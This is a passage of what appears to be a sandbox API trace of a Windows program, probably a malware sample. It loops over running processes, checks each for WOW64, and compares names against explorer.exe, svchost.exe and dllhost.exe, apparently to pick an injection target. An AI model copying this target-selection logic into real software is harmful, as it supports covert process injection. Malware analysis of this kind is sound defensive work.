[0245.967] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xec [0245.967] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0245.968] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0245.968] CloseHandle (hObject=0xec) returned 1 [0245.968] lstrcmpiA (lpString1="wooden.exe", lpString2="explorer.exe") returned 1 [0245.968] lstrcmpiA (lpString1="wooden.exe", lpString2="svchost.exe") returned 1 [0245.968] lstrcmpiA (lpString1="wooden.exe", lpString2="dllhost.exe") returned 1 [0245.968] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0245.968] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xec [0245.968] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0245.968] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0245.968] CloseHandle (hObject=0xec) returned 1 [0245.968] lstrcmpiA (lpString1="dallasr.exe", lpString2="explorer.exe") returned -1 [0245.968] lstrcmpiA (lpString1="dallasr.exe", lpString2="svchost.exe") returned -1 [0245.968] lstrcmpiA (lpString1="dallasr.exe", lpString2="dllhost.exe") returned -1 [0245.968] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0245.969] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xec [0245.969] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0245.969] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0245.969] CloseHandle (hObject=0xec) returned 1 [0245.969] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="explorer.exe") returned -1 [0245.969] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="svchost.exe") returned -1 [0245.969] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="dllhost.exe") returned -1 [0245.969] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0245.970] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xec [0245.970] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0245.970] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0245.970] CloseHandle (hObject=0xec) returned 1 [0245.970] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="explorer.exe") returned -1 [0245.970] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="svchost.exe") returned -1 [0245.970] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="dllhost.exe") returned -1 [0245.970] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0245.970] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xec [0245.970] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0245.970] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0245.970] CloseHandle (hObject=0xec) returned 1 [0245.970] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="explorer.exe") returned 1 [0245.970] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="svchost.exe") returned -1 [0245.970] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="dllhost.exe") returned 1 [0245.970] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0245.971] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xec [0245.971] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0245.971] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0245.971] CloseHandle (hObject=0xec) returned 1 [0245.971] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="explorer.exe") returned -1 [0245.971] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="svchost.exe") returned -1 [0245.971] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="dllhost.exe") returned 1 [0245.971] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0245.972] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xec [0245.972] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0245.972] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0245.972] CloseHandle (hObject=0xec) returned 1 [0245.972] lstrcmpiA (lpString1="population openings.exe", lpString2="explorer.exe") returned 1 [0245.972] lstrcmpiA (lpString1="population openings.exe", lpString2="svchost.exe") returned -1 [0245.972] lstrcmpiA (lpString1="population openings.exe", lpString2="dllhost.exe") returned 1 [0245.972] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0245.972] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0245.972] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0245.973] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0245.973] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0245.973] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0245.973] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0245.974] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0245.974] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0245.999] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0245.999] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0246.000] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xec [0246.000] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0246.000] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0246.000] CloseHandle (hObject=0xec) returned 1 [0246.000] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0246.001] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xec [0246.001] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0246.001] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0246.001] CloseHandle (hObject=0xec) returned 1 [0246.001] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0246.001] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0246.001] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0246.002] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xec [0246.002] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0246.002] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0246.002] CloseHandle (hObject=0xec) returned 1 [0246.002] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0246.002] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0246.002] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xec [0246.002] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0246.002] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0246.002] CloseHandle (hObject=0xec) returned 1 [0246.002] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0246.003] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0246.003] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x954) returned 0xec [0246.003] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0246.003] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0246.003] CloseHandle (hObject=0xec) returned 1 [0246.003] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 0 [0246.004] CloseHandle (hObject=0xe8) returned 1 [0246.004] Sleep (dwMilliseconds=0x3e8) [0247.003] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0247.005] Process32First (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0247.005] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0247.005] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0247.006] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0247.006] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0247.006] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0247.006] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0247.007] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0247.007] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0247.007] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0247.007] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0247.008] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0247.008] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0247.008] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0247.008] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0247.009] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0247.009] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0247.009] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0247.009] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0247.010] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0247.010] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0247.010] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0247.010] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0247.011] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0247.011] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0247.011] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0247.011] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0247.012] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0247.012] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0247.012] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0247.012] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0247.013] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0247.013] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0247.013] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0247.013] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0247.014] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0247.014] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0247.014] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xec [0247.014] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0247.014] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0247.015] CloseHandle (hObject=0xec) returned 1 [0247.015] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0247.015] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0247.015] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0247.015] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xec [0247.016] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0247.016] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0247.016] CloseHandle (hObject=0xec) returned 1 [0247.016] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0247.016] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0247.016] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0247.017] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0247.017] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0247.017] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xec [0247.017] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0247.017] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0247.017] CloseHandle (hObject=0xec) returned 1 [0247.017] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="explorer.exe") returned -1 [0247.017] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="svchost.exe") returned -1 [0247.017] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="dllhost.exe") returned -1 [0247.017] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0247.018] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xec [0247.018] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0247.018] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0247.018] CloseHandle (hObject=0xec) returned 1 [0247.018] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="explorer.exe") returned -1 [0247.018] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="svchost.exe") returned -1 [0247.018] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="dllhost.exe") returned -1 [0247.018] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0247.019] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xec [0247.019] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0247.019] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0247.019] CloseHandle (hObject=0xec) returned 1 [0247.019] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="explorer.exe") returned 1 [0247.019] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="svchost.exe") returned -1 [0247.019] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="dllhost.exe") returned 1 [0247.019] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0247.019] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xec [0247.019] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0247.019] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0247.019] CloseHandle (hObject=0xec) returned 1 [0247.019] lstrcmpiA (lpString1="definitely.exe", lpString2="explorer.exe") 